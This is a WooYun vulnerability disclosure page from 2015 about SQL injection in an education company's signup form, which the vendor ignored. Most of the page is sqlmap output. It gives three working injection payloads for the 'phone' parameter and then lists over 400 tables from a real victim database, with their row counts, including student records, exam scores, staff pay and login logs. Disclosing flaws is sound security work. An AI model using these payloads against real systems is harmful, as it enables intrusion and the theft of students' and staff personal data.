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漏洞作者: 路人甲

提交时间:2015-11-27 11:08

修复时间:2015-12-02 11:10

公开时间:2015-12-02 11:10





漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]


4人收藏 收藏



2015-11-27: 细节已通知厂商并且等待厂商处理中
2015-12-02: 厂商已经主动忽略漏洞,细节向公众公开



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sqlmap resumed the following injection point(s) from stored session:
Parameter: phone (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: classes_id=11544&cnname=e&phone=-9389") OR 6379=6379#&region_id=10&serial=e&signuptype=1&_=
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: classes_id=11544&cnname=e&phone=11") AND (SELECT 1377 FROM(SELECT COUNT(*),CONCAT(0x7170787671,(SELECT (ELT(1377=1377,1))),0x7178787671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND ("prtl"="prtl&region_id=10&serial=e&signuptype=1&_=
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: classes_id=11544&cnname=e&phone=11") AND (SELECT * FROM (SELECT(SLEEP(5)))mGJp) AND ("LBwc"="LBwc&region_id=10&serial=e&signuptype=1&_=
back-end DBMS: MySQL 5.0
Database: homework
| Table | Entries |
| `校内网录音下载日志` | 34005829 |
| lily_downstats | 4795086 |
| `2014_mp3_download_log` | 2883620 |
| lily_32_downlogs | 1899901 |
| lily_28_downlogs | 1776971 |
| lily_down_28 | 1776971 |
| lily_26_downlogs | 1740998 |
| lily_30_downlogs | 1699730 |
| lily_34_downlogs | 1193222 |
| lily_downdailyusers | 1170052 |
| temperatures | 1123873 |
| lily_downstat_today | 987384 |
| lily_32_edufeed | 858739 |
| lily_30_edufeed | 847982 |
| lily_28_edufeed | 811629 |
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| lily_28_student_performances | 699378 |
| lily_29_downlogs | 682139 |
| lily_30_student_performances | 678993 |
| lily_26_student_performances | 673163 |
| `短信队列` | 670469 |
| lily_33_downlogs | 632292 |
| `2014_homework_read_log` | 602651 |
| lily_34_edufeed | 588179 |
| lily_32_downlogs_web | 503238 |
| lily_34_student_performances | 449627 |
| lily_feed_old | 410959 |
| lily_30_downlogs_web | 401287 |
| lily_28_downlogs_web | 387851 |
| `登录日志` | 367930 |
| lily_student_archive | 363956 |
| lily_classes_student | 349573 |
| lily_business_logs | 336046 |
| lily_order_logs | 315386 |
| lily_34_downlogs_web | 296475 |
| lily_acc_logs | 291675 |
| `借阅日志` | 270564 |
| lily_33_student_performances | 267208 |
| lily_29_student_performances | 250364 |
| lily_33_edufeed | 241927 |
| lily_27_downlogs | 230249 |
| lily_31_downlogs | 223465 |
| lily_29_edufeed | 214003 |
| lily_26_downlogs_web | 204133 |
| `订单表` | 187550 |
| lily_student_archive_130115 | 176433 |
| lily_student_region | 173521 |
| lily_serial_logs | 153345 |
| lily_record_info | 138012 |
| lily_downstat_today_old | 130301 |
| course_log | 128036 |
| create_tuition_log | 106662 |
| lily_student_test | 101284 |
| lily_29_downlogs_web | 98583 |
| lily_kq_region_teachers | 94629 |
| lily_32_downlists | 91504 |
| lily_downqueues | 91180 |
| goods_nvestigate | 90254 |
| lily_31_student_performances | 87527 |
| lily_27_edufeed | 87242 |
| lily_28_downlists | 86887 |
| lily_26_downlists | 85465 |
| lily_27_student_performances | 84070 |
| lily_31_edufeed | 83847 |
| lily_30_downlists | 81418 |
| lily_26_edufeed | 80251 |
| lily_rszp_interview | 79239 |
| lily_experience | 59736 |
| lily_34_downlists | 57885 |
| lily_tingke_comment | 55227 |
| `2014_sid_status` | 49199 |
| lily_members | 49196 | //5万学员信息
| xtelview | 49196 |
| `预报名学员` | 47098 |
| lily_users | 45050 |
| lily_boxmsg_logs | 43654 |
| lily_rszp_userinform | 43570 |
| lily_classes_attendtime | 39559 |
| lily_course_planlog | 38040 |
| student_order | 37697 |
| lily_28_homework | 36070 |
| lily_32_homework | 35656 |
| lily_26_homework | 35521 |
| lily_28_teacher_performances | 35080 |
| lily_32_teacher_performances | 34880 |
| lily_30_comments | 34450 |
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| lily_30_examscores_v | 32696 |
| lily_32_examscores | 31641 |
| lily_32_examscores_v | 31641 |
| lily_33_downlists | 31584 |
| lily_teacher_homeworkcollect | 31062 |
| lily_33_downlogs_web | 30872 |
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| lily_28_examscores_v | 28669 |
| lily_book_logs | 28663 |
| lily_33_examscores | 28482 |
| lily_33_examscores_v | 28482 |
| lily_32_refer_edu | 28479 |
| lily_26_examscores | 27844 |
| lily_26_examscores_v | 27844 |
| lily_30_refer_edu | 27559 |
| lily_28_refer_edu | 27309 |
| lily_29_examscores | 26872 |
| lily_29_examscores_v | 26872 |
| lily_parent_evaluation | 26812 |
| lily_teacher_history | 25610 |
| lily_library_book_logs | 25574 |
| lily_staff_gongzi | 24878 |
| lily_rszp_processlog | 24318 |
| receipt | 23770 |
| lily_34_homework | 23682 |
| lily_linux_clients | 23336 |
| lily_classes_teacher | 23315 |
| lily_library_bookreview_studentanswer | 23246 |
| lily_32_exam | 23240 |
| lily_26_comments | 23211 |
| lily_33_refer_edu | 22822 |
| lily_34_teacher_performances | 22328 |
| lily_28_exam | 22065 |
| lily_30_exam | 22025 |
| lily_classes_relation | 21742 |
| lily_29_refer_edu | 21419 |
| lily_26_exam | 20309 |
| lily_31_downlogs_web | 20210 |
| lily_28_comments | 19796 |
| lily_32_comments | 19783 |
| lily_28_examscores_v0 | 19758 |
| lily_classes | 19552 |
| lily_feed | 19155 |
| lily_26_examscores_v0 | 19022 |
| lily_30_examscores_v0 | 18308 |
| lily_32_examscores_v0 | 18239 |
| lily_26_exam_inform | 18233 |
| lily_library_book_lists | 18225 |
| lily_28_exam_inform | 18186 |
| lily_hr_gongzi | 17995 |
| lily_30_exam_inform | 17536 |
| lily_32_exam_inform | 17340 |
| lily_student_test_timelogs | 17041 |
| lily_33_examscores_v0 | 16891 |
| lily_29_examscores_v0 | 16523 |
| liubo_questionnaire | 16440 |
| lily_classes_hour | 15828 |
| lily_26_terminaljudge | 15649 |
| dashboard | 15543 |
| lily_data_logs | 15339 |
| lily_classes_evaluate | 14501 |
| lily_library_reading_history | 14100 |
| lily_33_homework | 13808 |
| lily_student_test_returnvisit | 13420 |
| lily_24_terminaljudge | 13395 |
| lily_33_teacher_performances | 13356 |
| lily_29_homework | 12816 |
| lily_34_comments | 12790 |
| lily_tingke | 12784 |
| lily_classes_summarytest | 12643 |
| lily_29_teacher_performances | 12633 |
| lily_communic_record | 11986 |
| lily_27_downlists | 11796 |
| callbacklist_questionnaire | 11771 |
| lily_student_investigate | 11070 |
| lily_31_downlists | 10791 |
| lily_service_project | 9975 |
| lily_complaint | 9630 |
| lily_32_examscores_v1 | 9018 |
| lily_document | 8544 |
| lily_2d_code | 8372 |
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| lily_31_refer_edu | 7386 |
| lily_27_refer_edu | 7167 |
| lily_30_examscores_v1 | 6830 |
| lily_33_examscores_v1 | 6763 |
| lily_28_examscores_v1 | 6612 |
| lily_library_book_users | 6369 |
| lily_26_examscores_v1 | 6235 |
| lily_operations_kpi | 6045 |
| lily_student_transfer | 5750 |
| lily_return | 5448 |
| lily_turnover_rate | 5408 |
| lily_book_lists | 5371 |
| lily_member_changeshift | 5334 |
| lily_29_examscores_v1 | 5284 |
| temp_investgate_xiaonei | 5247 |
| `试听课打印单流水` | 5150 |
| lily_changeclasses | 4571 |
| lily_27_homework | 4489 |
| lily_27_teacher_performances | 4404 |
| lily_31_homework | 4298 |
| lily_31_teacher_performances | 4226 |
| lily_members_info | 4157 |
| lily_book_users | 4107 |
| task_queue | 3777 |
| lily_course_classes | 3611 |
| lily_kq_regions | 3543 |
| lily_staff_gongzi_tmp | 3216 |
| lily_acc_logs_refund | 3124 |
| lily_29_comments | 3118 |
| lily_tutor_settings | 2879 |
| lily_33_comments | 2649 |
| lily_invoice | 2444 |
| lily_student_phonelogs | 2229 |
| gonghao | 2099 |
| lily_tutor | 2023 |
| lily_library_addbook_log | 2012 |
| lily_tutor_gongzi | 1995 |
| lily_classes_material | 1953 |
| lily_teacher_post | 1952 |
| lily_library_bookreview | 1945 |
| lily_publicclass | 1878 |
| lily_teacher_event | 1834 |
| lily_material_record | 1817 |
| lily_tapes | 1787 |
| lily_28_exam_rule | 1774 |
| lily_34_billboard | 1749 |
| lily_26_exam_rule | 1694 |
| lily_teacher_accidents | 1683 |
| lily_30_exam_rule | 1677 |
| lily_creadit | 1670 |
| lily_33_billboard | 1656 |
| lily_32_exam_rule | 1655 |
| lily_teacher_month_cont | 1503 |
| lily_32_billboard | 1492 |
| lily_30_billboard | 1488 |
| lily_27_comments | 1487 |
| lily_caijiang2011 | 1443 |
| lily_warehouse_list | 1410 |
| lily_30_wastagerate | 1397 |
| lily_library_region_stock | 1373 |
| lily_order_logs_refund | 1297 |
| lily_28_wastagerate | 1288 |
| lily_29_billboard | 1283 |
| lily_log | 1260 |
| lily_26_wastagerate | 1253 |
| lily_28_billboard | 1253 |
| pscns | 1250 |
| lily_32_wastagerate | 1247 |
| lily_26_billboard | 1223 |
| lily_31_comments | 1200 |
| lily_33_wastagerate | 1129 |
| lily_admissions | 1112 |
| lily_teacher_detailed | 1110 |
| lily_teachers | 1109 |
| lily_29_wastagerate | 1080 |
| lily_business_logs_refund | 1059 |
| lily_staff | 1034 |
| lily_2014_student_performances | 1015 |
| lily_tutor_classes | 1000 |
| lily_diliver_list | 994 |
| lily_wastagerate | 950 |
| lily_bound | 905 |
| lily_rszp_school | 802 |
| lily_teacher_scores | 796 |
| lily_library_bookreview_question | 763 |
| lily_teacher_praise | 725 |
| lily_31_billboard | 696 |
| lily_2014_downlogs | 682 |
| lily_student_markinfo | 673 |
| lily_admin | 671 |
| lily_teaching_log | 647 |
| lily_map_operationsaccess | 553 |
| lily_teacher_leavelsfei | 552 |
| `教师编码表` | 535 |
| weixin | 503 |
| lily_admin_group_access | 494 |
| lily_books | 470 |
| lily_map_admin | 461 |
| lily_student_discount | 433 |
| lily_teacher_lastkq | 416 |
| lily_classes_group | 411 |
| camplily | 408 |
| lily_monitor_equipment | 402 |
| lily_teacher_leavels | 395 |
| lily_course | 393 |
| lily_27_wastagerate | 374 |
| lily_27_billboard | 368 |
| lily_consultation | 361 |
| lily_31_wastagerate | 355 |
| lily_book_content | 330 |
| lily_library_book_content | 330 |
| lily_new_classes | 321 |
| lily_kq_items | 304 |
| lily_admin_resource_doresource | 294 |
| lily_achievement | 280 |
| lily_region_setting | 270 |
| lily_tutor_estimate | 270 |
| lily_library_books | 269 |
| lily_teacher_complaint | 258 |
| lily_material | 239 |
| lily_turnover | 238 |
| sheet1 | 232 |
| lily_paylevel_logs | 231 |
| remove_lily_operations_management | 215 |
| remove_lily_topfive_votes | 212 |
| lily_teacher_resign | 203 |
| lily_inspection | 201 |
| lily_camp_qa | 197 |
| lily_sanction | 188 |
| online | 151 |
| lily_staff_grade | 144 |
| lily_teacher_rule | 143 |
| reading_score | 143 |
| lily_kq_teacher | 139 |
| complain | 136 |
| lily_student_blacklist | 135 |
| tbl_op_sch_check | 128 |
| lily_posts | 116 |
| lily_goods_order | 115 |
| lily_attendtime | 110 |
| lily_middle_students | 108 |
| lily_wh_register | 102 |
| lily_admin_resource | 100 |
| dailyperformance | 98 |
| lily_resignation | 97 |
| jjjjj | 96 |
| lily_library_cancel_log | 96 |
| lily_tuijian | 95 |
| lily_graduates | 87 |
| video | 85 |
| lily_course_items | 84 |
| lily_middle_classes_students | 84 |
| lily_user_scorecard | 80 |
| lily_course_apply | 79 |
| lily_msg_log | 74 |
| lily_leave | 73 |
| lily_rszp_professional | 72 |
| lily_postrecord | 70 |
| lily_33_exam_inform | 69 |
| lily_kq_holiday | 68 |
| v_result_teacher_investigate | 54 |
| lily_teacher_map | 53 |
| `工作任务` | 50 |
| `2014_test_temp` | 43 |
| camp_gradelist | 43 |
| lily_acc_accounts | 43 |
| lily_resume | 43 |
| lily_2014_downlists | 42 |
| lily_hr_class | 40 |
| goodslist | 37 |
| lily_dl_register | 36 |
| lily_operations_leavels | 35 |
| lily_operations_map | 35 |
| lily_province | 35 |
| lily_36_downlists | 34 |
| lily_cost | 34 |
| lily_grade | 34 |
| lily_creadit_copy | 33 |
| lily_semester | 33 |
| lily_teacher_resignself | 30 |
| lily_33_exam | 29 |
| lily_hr_position | 28 |
| lily_29_exam_inform | 27 |
| lily_library_book_albums | 27 |
| lily_book_albums | 26 |
| lily_train | 26 |
| lily_regions | 25 |
| lily_department | 24 |
| lily_settings | 24 |
| lily_staff_configs | 23 |
| lily_operations_resign | 22 |
| school | 22 |
| lily_operations_post | 21 |
| camp_age | 18 |
| lily_28_web | 13 |
| lily_downsession | 13 |
| lily_post | 12 |
| lily_praise | 12 |
| lily_admin_group | 11 |
| lily_32_web | 10 |
| lily_admin_doresource | 10 |
| lily_student_acc_setup | 9 |
| lilyren_comment | 8 |
| lily_30_web | 7 |
| lily_31_web | 7 |
| lily_34_web | 7 |
| lily_company | 7 |
| lily_34_exam_rule | 6 |
| xxb_program | 6 |
| lily_29_exam_rule | 5 |
| lily_boxmsg | 5 |
| lilyren_article | 5 |
| remove_lily_topfive | 5 |
| taxcontrolmachine | 5 |
| lily_30_basefee | 4 |
| lily_33_exam_rule | 4 |
| lily_archive_level | 4 |
| lily_archive_managelevel | 4 |
| lily_middle_classes | 4 |
| lily_teacher_month | 4 |
| lily_userfile | 4 |
| classify | 3 |
| jishubu_weixiu | 3 |
| lily_material_lost | 3 |
| lily_msg_view | 3 |
| lily_semester_coursetime | 3 |
| lily_teacher_comps | 3 |
| jishubu_tele | 2 |
| lily_26_basefee | 2 |
| lily_27_basefee | 2 |
| lily_27_web | 2 |
| lily_28_basefee | 2 |
| lily_29_basefee | 2 |
| lily_29_web | 2 |
| lily_33_web | 2 |
| lily_30_downlogs_ios | 1 |
| lily_31_basefee | 1 |
| lily_32_basefee | 1 |
| lily_33_basefee | 1 |
| lily_34_basefee | 1 |
| lily_35_basefee | 1 |
| lily_36_basefee | 1 |
| lily_auth_apply | 1 |
| lily_formteacher_student | 1 |
| lily_staff_settings | 1 |
| lily_teacher_quarter | 1 |
| videolist | 1 |



版权声明:转载请注明来源 路人甲@乌云




忽略时间:2015-12-02 11:10


漏洞Rank:4 (WooYun评价)

